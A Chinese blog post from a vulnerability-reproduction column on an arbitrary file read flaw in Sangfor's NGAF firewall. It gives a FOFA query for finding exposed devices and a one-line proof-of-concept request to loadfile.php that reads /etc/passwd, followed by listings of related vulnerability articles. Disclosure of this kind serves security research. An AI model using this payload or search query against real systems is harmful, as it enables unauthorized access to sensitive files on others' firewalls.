【漏洞复现】某厂商NGAF防火墙任意文件读取漏洞

最新推荐文章于 2024-04-29 14:15:12 发布
最新推荐文章于 2024-04-29 14:15:12 发布
阅读量1.1k 收藏 8
点赞数 9
文章标签: 安全 web安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37113223/article/details/136361202
版权
【漏洞复现】 专栏收录该内容
146 篇文章 1 订阅

已下架不支持订阅

Nx01 产品简介

        深信服下一代防火墙NGAF专注网络边界安全效果,通过应用丰富的安全创新防御技术和简单易用的产品设计理念,不仅增强网络边界的安全检测与防控能力,而且实现网络安全风险可视化展示与快速处置,让组织网络边界安全建设更有效、更简单。

Nx02 漏洞描述

        深信服下一代防火墙NGAF存在任意文件读取漏洞,攻击者可以利用该漏洞获取敏感信息。

Nx03 产品主页

fofa-query: web.title=="SANGFOR | NGAF"

Nx04 漏洞复现

POC:

/svpn_html/loadfile.php?file=/etc/./passwd

Nx05 修复建议

建议联系软件厂商进行处理。

晚风不及你ღ
关注
专栏目录

已下架不支持订阅

漏洞复现深信服下一代防火墙NGAF存在任意文件上传漏洞 附POC
失心少年
11-09 876
不仅能够实现网络层访问控制的功能,且能够对应用进行识别、控制、防护, 解决了传统防火墙应用层控制和防护能力不足的问题。区别于传统DPI技术的入侵防御系统,深信服NGAF具备深入应用内容的威胁分析能力,具备双向的内容检测能力为用户提供完整的应用层安全防护功能。同样都能防护web攻击,与web应用防火墙关注web应用程序安全的设计理念不同,深信服下一代防火墙NGAF关注web系统在对外发布的过程中各个层面的安全问题,为对外发布系统打造坚实的防御体系。本文所提供的工具仅用于学习,禁止用于其他!
深信服数据中心管理系统 XXE漏洞复现
0xSec
08-16 2403
深信服数据中心管理系统DC存在XML外部实体注入漏洞。由于后端对传入的XML对象进行了非预期内解析,攻击者可以利用该漏洞进行XML注入攻击,获取系统敏感信息。
技术分享 | 某下一代防火墙远程命令执行漏洞分析及防护绕过
m0_46699477的博客
10-26 1405
在本文中,我们对某下一代防火墙的命令执行漏洞进行了分析,并发现了命令执行无回显等限制。
技术分享 某下一代防火墙远程命令执行漏洞分析及防护绕过_深信服下一代防火墙ngaf login远程命令执行漏洞(1)
最新发布
2301_76224593的博客
04-29 906
1=hex2bin // 绕过写法。
【1day】复现深信服数据中心管理系统 XXE漏洞——可读取文件
记录并分享学习安全的知识点..
08-16 412
深信服的数据中心管理系统DC是一种外置的AC(异地扩展备份管理)数据中心,它提供了强大的功能和灵活性,旨在满足日志数据处理的需求。该系统具备多种高级功能,包括多条件组合的高效查询、统计和生成趋势报表,以及实时监控设备的运行状态等。深信服数据中心管理系统存在XXE漏洞
2020HW深某服0day复现
ranuy阮的博客
08-25 993
0x01 描述 终端检测响应平台EDR,围绕终端资产安全生命周期,通过预防、防御、检测、响应赋予终端更为细致的隔离策略、更为精准的查杀能力、更为持续的检测能力、更为快速的处置能力。在应对高级威胁的同时,通过云网端联动协同、威胁情报共享、多层级响应机制,帮助用户快速处置终端安全问题,构建轻量级、智能化、响应快的下一代终端安全系统。 0x02 背景 2020年HW第1天,深某服EDR被爆0day的截图在广大安全朋友圈中广为传播,后续hw暂停。 0x03 漏洞复现 以fofa搜索为例子,搜索语法: title=“
记某信漏洞复现
hackzkaq的博客
10-12 187
通常访问的页面如下,存在登录框。
深信服应用交付报表任意文件读取漏洞
剁椒鱼头没剁椒的博客
02-10 2015
深信服应用交付报表系统 download.php文件存在任意文件读取漏洞,攻击者通过漏洞可以下载服务器任意文件
深信服NGAF防火墙产品分析.pptx
10-13
深信服NGAF防火墙产品分析.pptx
技术分享 某下一代防火墙远程命令执行漏洞分析及防护绕过_深信服下一代防火墙ngaf login远程命令执行漏洞
2401_83621634的博客
04-14 868
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!
深信服应用交付报表系统存在任意文件读取漏洞
nnn2188185的博客
06-15 1121
微信公众号搜索:南风漏洞复现文库该文章 南风漏洞复现文库 公众号首发深信服应用交付报表系统。
Goby 漏洞发布|深信服下一代防火墙 loadfile.php 文件读取漏洞
m0_46699477的博客
10-07 990
深信服下一代防火墙是一款以应用安全需求出发而设计的下一代应用防火墙深信服下一代防火墙在 loadfile.php 处存在文件读取漏洞,攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
漏洞复现】H3C Web网管登录任意文件读取漏洞
晚风不及你
02-18 2672
H3C设备的Web网管是指H3C公司生产的网络设备的网络管理界面。它可以通过Web浏览器进行访问和操作,以实现对网络设备的配置、管理和监控。
深信服 应用交付管理系统 login 存在远程命令执行漏洞
m0_52333295的博客
08-20 1167
深信服 应用交付管理系统 login 存在远程命令执行漏洞,攻击者通过漏洞可以获取服务器权限,执行任意命令。
深信服EDR终端检测平台-RCE漏洞复现
thelostworld
08-18 2225
​昨晚通宵,刚刚睡醒发现群里面炸锅了-EDR终端检测平台RCE 自己也来看看。 简介: EDR简介(来自官方): 终端检测响应平台(EDR)是深信服公司提供的一套终端安全解决方案,方案由轻量级的端点安全软件(Agent)和管理平台(MGR)共同组成。 EDR的管理平台支持统一的终端资产管理、终端病毒查杀、终端合规检查,支持微隔离的访问控制策略统一管理,支持对安全事件的一键隔离处置,以及热点事件IOC的全网威胁定位。 端点软件支持防病毒功能、入侵防御功能、防火墙隔离功能、数据信息采集上报、一键处置等。深信服
h3c网络管理系统任意文件读取漏洞(含批量验证poc)
weixin_43567873的博客
04-01 374
h3c网络管理系统任意文件读取漏洞(含批量验证poc)
深信服EDR任意用户登录与命令执行漏洞
剁椒鱼头没剁椒的博客
01-18 4458
终端检测响应平台(EDR)是深信服公司提供的一套终端安全解决方案,方案由轻量级的端点安全软件(Agent)和管理平台(MGR)共同组成。EDR的管理平台支持统一的终端资产管理、终端病毒查杀、终端合规检查,支持微隔离的访问控制策略统一管理,支持对安全事件的一键隔离处置,以及热点事件IOC的全网威胁定位。端点软件支持防病毒功能、入侵防御功能、防火墙隔离功能、数据信息采集上报、一键处置等。
CNVD-2020-46552 深信服EDR命令执行漏洞
nnn2188185的博客
03-22 993
深信服终端监测响应平台(EDR)存在远程命令执行漏洞。攻击者可通过构造HTTP请求来利用此漏洞,成功利用此漏洞的攻击者可以在目标主机上执行任意命令。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值